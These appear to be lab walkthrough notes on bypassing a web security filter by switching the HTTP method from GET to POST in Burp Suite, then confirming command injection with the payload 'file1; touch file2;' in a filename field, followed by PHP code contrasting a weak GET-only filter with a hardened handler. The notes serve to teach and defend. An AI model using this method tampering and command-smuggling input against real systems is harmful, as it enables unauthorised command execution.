Insecure coding errors made during the development of the web application can leave certain functionalities not covering all HTTP methods. This is commonly found in security filters that detect malicious requests.
#identify the restricted page by walking the application
root@oco:~$ BROWSER > {targetSite:port}
input field: {arbitraryValue};
output: Malicious Request Denied!
* semi-colon is used to test the webapp's security filtering mechanism
#intercept & change the request method
root@oco:~$ burpsuite
root@oco:~$ BROWSER > FoxyProxy > Burp
root@oco:~$ BURP SUITE > Proxy > Intercept is on
input field: {arbitraryValue};
BURP > Proxy
Request
...
POST /index.php HTTP/1.1 //changed from GET to POST
Host: 94.237.54.116:31220
Referer: http://94.237.54.116:31220/index.php
Content-Type: application/x-www-form-urlencoded

filename=test2%3B
* changing the HTTP request method may bypass the security filter
#confirm bypass through cmd injection vulnerability
BURP > Proxy > Change Request Method
input field: file1; touch file2;
Request
...
POST /index.php HTTP/1.1 //changed from GET to POST
Host: 94.237.54.116:31220
Referer: http://94.237.54.116:31220/index.php
Content-Type: application/x-www-form-urlencoded

filename=file1%3B+touch+file2%3B
* forward the modified request as many times as necessary
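
The coding error behind the bypass above, next to a corrected handler. This is an added example, not code from the original notes or from the tested application: the function names and the allowlist pattern are assumptions, and only the `filename` parameter and the denial message come from the walkthrough. The weak filter inspects the GET parameters while the handler consumes a merged GET+POST view (as `$_REQUEST` does), so a value sent in a POST body is never checked.

```php
<?php
// Added illustration: function names are hypothetical; "filename" and the
// denial message are taken from the captured requests above.

// Weak: the filter looks at GET parameters only.
function weak_filter_blocks(array $get): bool {
    return isset($get['filename'])
        && preg_match('/[^A-Za-z0-9_.]/', $get['filename']) === 1;
}

// Weak: $method is never consulted, and the value that is used comes from a
// merged GET+POST view, so a POST body reaches it without being filtered.
function weak_handler(string $method, array $get, array $post): string {
    if (weak_filter_blocks($get)) {
        return 'Malicious Request Denied!';
    }
    $request = array_merge($get, $post);   // POST overrides GET
    return 'would process: ' . ($request['filename'] ?? '');
}

// Hardened: pick exactly one parameter source per allowed method, reject all
// other methods, and validate the same value that is later consumed.
function hardened_handler(string $method, array $get, array $post): string {
    $source = ['GET' => $get, 'POST' => $post][$method] ?? null;
    if ($source === null) {
        return '405 Method Not Allowed';
    }
    $name = $source['filename'] ?? '';
    if (!is_string($name) || preg_match('/\A[A-Za-z0-9_.]{1,64}\z/', $name) !== 1) {
        return 'Malicious Request Denied!';
    }
    return 'would process: ' . $name;
}

// Constructed sample requests mirroring the walkthrough above.
$samples = [
    ['GET',  ['filename' => 'test2;'], []],
    ['POST', [], ['filename' => 'test2;']],
    ['POST', [], ['filename' => 'notes.txt']],
    ['PUT',  [], ['filename' => 'notes.txt']],
];
foreach ($samples as [$method, $get, $post]) {
    printf("%-4s weak=%-28s hardened=%s\n", $method,
        weak_handler($method, $get, $post), hardened_handler($method, $get, $post));
}
```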